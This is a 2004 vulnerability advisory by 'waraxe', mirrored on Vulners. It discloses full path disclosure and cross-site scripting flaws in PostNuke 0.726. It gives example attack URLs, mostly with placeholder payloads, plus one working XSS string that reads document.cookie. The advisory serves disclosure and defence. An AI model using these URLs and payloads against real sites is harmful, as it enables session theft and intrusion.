Vulners
Lucene search
waraxe-2004-SA022.txt
🗓️ 22 Apr 2004 00:00:00Reported by Janek Vind aka waraxeType 
packetstorm🔗 packetstormsecurity.com👁 39 Views
`
{================================================================================}
{ [waraxe-2004-SA#022] }
{================================================================================}
{ }
{ [ Multiple vulnerabilities in PostNuke 0.726 Phoenix - part 2 ] }
{ }
{================================================================================}
Author: Janek Vind "waraxe"
Date: 21. April 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=22
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PostNuke: The Phoenix Release (0.7.2.6)
PostNuke is an open source, open developement content management system
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and
provides many enhancements and improvements over the PHP-Nuke system. PostNuke
is still undergoing development but a large number of core functions are now
stabilising and a complete API for third-party developers is now in place.
If you would like to help develop this software, please visit our homepage
at http://noc.postnuke.com/
You can also visit us on our IRC Server irc.postnuke.com channel
#postnuke-support
#postnuke-chat
#postnuke
Or at the Community Forums located at:
http://forums.postnuke.com/
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A. Full path disclosure:
A1 - all blocks in "includes/blocks/" directory are not secured against direct access
Example:
http://localhost/postnuke0726/includes/blocks/finclude.php
Fatal error: Call to undefined function: pnsecaddschema() in D:\apache_wwwroot\postnuke0726\includes\blocks\finclude.php on line 44
A2 - many scripts in "pnadodb" directory are not secured against direct access
Example:
http://localhost/postnuke0726/pnadodb/drivers/adodb-access.inc.php
Warning: main(ADODB_DIR/drivers/adodb-odbc.inc.php): failed to open stream: No such file or directory in D:\apache_wwwroot\postnuke0726\pnadodb\drivers\adodb-access.inc.php on line 14
Warning: main(): Failed opening 'ADODB_DIR/drivers/adodb-odbc.inc.php' for inclusion (include_path='.;c:\php4\pear') in D:\apache_wwwroot\postnuke0726\pnadodb\drivers\adodb-access.inc.php on line 14
Fatal error: Class adodb_access: Cannot inherit from undefined class adodb_odbc in D:\apache_wwwroot\postnuke0726\pnadodb\drivers\adodb-access.inc.php on line 19
A3 - full path disclosure in "NS-NewUser" module
http://localhost/postnuke0726/modules/NS-NewUser/user.php
Fatal error: Call to undefined function: modules_get_language() in D:\apache_wwwroot\postnuke0726\modules\NS-NewUser\user.php on line 31
A4 - full path disclosure in "NS-Your_Account" module
http://localhost/postnuke0726/modules/NS-Your_Account/user/links/links.changehome.php
http://localhost/postnuke0726/modules/NS-Your_Account/user/case/case.changehome.php?op=edithome
A5 - full path disclosure in "NS-LostPassword" module
http://localhost/postnuke0726/modules/NS-LostPassword/user.php
A6 - full path disclosure in "NS-Multisites" module
http://localhost/postnuke0726/modules/NS-Multisites/chgtheme.inc.php
http://localhost/postnuke0726/modules/NS-Multisites/head.inc.php
http://localhost/postnuke0726/modules/NS-Multisites/print.inc.php
A7 - full path disclosure in "NS-User" module
http://localhost/postnuke0726/modules/NS-User/tools.php
http://localhost/postnuke0726/modules/NS-User/user.php
B. Cross-site scripting aka XSS:
XSS exploits works on PostNuke only if special anti-filtering measures are used!
B1 - XSS in "Downloads" module (2 cases)
http://localhost/postnuke0726/modules.php?op=modload&name=Downloads&file=index&req=ratedownload&ttitle=x&lid=>[xss code here]
http://localhost/postnuke0726/modules.php?op=modload&name=Downloads&file=index&req=search&query=>[xss code here]
B2 - XSS in "Web_Links" module
http://localhost/postnuke0726/modules.php?op=modload&name=Web_Links&file=index&req=search&query=>[xss code here]
B3 - XSS in "openwindow.php" script
http://localhost/postnuke0726/javascript/openwindow.php?hlpfile=x<html><body>[xss code here]
http://localhost/postnuke0726/javascript/openwindow.php?hlpfile=x<html><body%20onload=alert(document.cookie);>
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to torufoorum members and to all bugtraq readers in Estonia! Tervitused!
Special greets to UT Bee Clan members at http://bees.tk ! "Control point secured!" ;)
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[email protected]
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/
---------------------------------- [ EOF ] ------------------------------------
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Apr 2004 00:00Current
7.4High risk
Vulners AI Score7.4